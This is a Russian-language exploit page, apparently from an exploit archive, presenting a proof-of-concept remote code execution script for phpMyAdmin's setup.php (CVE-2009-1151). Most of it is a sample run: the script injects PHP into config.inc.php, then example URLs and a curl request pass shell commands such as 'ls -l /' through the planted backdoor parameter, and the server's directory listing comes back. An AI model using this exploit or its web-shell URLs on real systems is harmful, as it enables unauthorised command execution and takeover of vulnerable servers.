
phpMyAdmin '/scripts/setup.php' PHP-инъекция кода RCE PoC (CVE-2009-1151)
Эксплойт RCE (удалённое выполнение кода) для phpMyAdmin через инъекцию PHP-кода в '/scripts/setup.php'. Это был первый публично опубликованный эксплойт для CVE-2009-1151.
$ ./phpMyAdminRCE.sh
использование: ./phpMyAdminRCE.sh <базовый_URL_phpMyAdmin>
пример: ./phpMyAdminRCE.sh http://цель.tld/phpMyAdmin/
$ ./phpMyAdminRCE.sh http://172.16.211.10/phpMyAdmin-3.0.1.1/
[+] проверка существования phpMyAdmin по указанному URL ...
[+] cookie и токен формы phpMyAdmin успешно получены. Отлично!
[+] попытка внедрения phpinfo() ...
[+] успех! phpinfo() успешно внедрена! вывод сохранён в /tmp/phpMyAdminRCE.sh.9217.phpinfo.flag.html
[+] теперь вы *должны* иметь возможность удалённо выполнять команды оболочки и PHP-код через браузер. Например:
http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?c=ls+-l+/
http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?p=phpinfo();
пожалуйста, отправляйте любые отзывы/улучшения для этого скрипта на unknown.pentester<AT_sign_goes_here>gmail.com
$ curl "http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?c=ls+-l+/"
total 96
drwxr-xr-x 2 root root 4096 Mar 11 10:12 bin
drwxr-xr-x 3 root root 4096 May 6 10:01 boot
lrwxrwxrwx 1 root root 11 Oct 12 2008 cdrom -> media/cdrom
drwxr-xr-x 15 root root 14300 Jun 5 09:02 dev
drwxr-xr-x 147 root root 12288 Jun 5 09:02 etc
drwxr-xr-x 3 root root 4096 Oct 18 2008 home
drwxr-xr-x 2 root root 4096 Jul 2 2008 initrd
_[частичный вывод удалён для краткости]_